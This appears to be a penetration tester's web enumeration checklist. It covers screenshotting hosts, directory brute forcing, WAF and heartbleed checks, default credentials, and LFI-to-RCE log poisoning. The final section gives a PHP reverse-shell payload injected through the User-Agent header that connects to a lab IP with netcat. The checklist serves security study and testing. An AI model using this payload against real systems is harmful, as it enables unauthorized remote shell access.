Enumeration checklist

Checklist

Web Scanning

Web Scanning

Brute forcing HTTP(s) directories and files

Directory Discovery

HTTPs certification

Might have username

Script to preview the website from IP in html

Create a list of the IP and Extract PNG

for ip in $(cat web-ip.txt | grep 80 | grep -v "Nmap" |
awk '{print $2}'); do cutycapt --url=$ip --out=$ip.png;done

Make it HTML pngtohtml.sh

#!/bin/bash
# Bash script to examine the scan results through HTML.
echo "<HTML><BODY><BR>" > web.html
ls -1 *.png | awk -F : '{ print $1":\n<BR><IMG SRC=\""$1""$2"\" width=600><BR>"}' >> w
eb.html
echo "</BODY></HTML>" >> web.html

Creating wordlist from webpage

  • cewl

Redirecting webpage automatically?

  • noredirect plugin

Login page

Identify WAF

wafw00f

Find version vulnerability?

  • Google

HTTPS heartbleed

  • Scan for heartbleed

    sslscan $ip:443
    nmap -sV --script=ssl-heartbleed $ip

Password?

When presented with an enter credentials page, the first thing I try is common credentials (admin/admin, admin/password).

If that doesn’t work out, I look for default credentials online that are specific to the technology. Last, I use a password cracker if all else fails.

Log poisoning

From LFI to RCE

If you get local file inclusion for log, you maybe can log poisoning the log

Change user agent by intercept in burp to this to get reverse shell

nc -lnvp 4444
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 4444 >/tmp/f') ?>

Last updated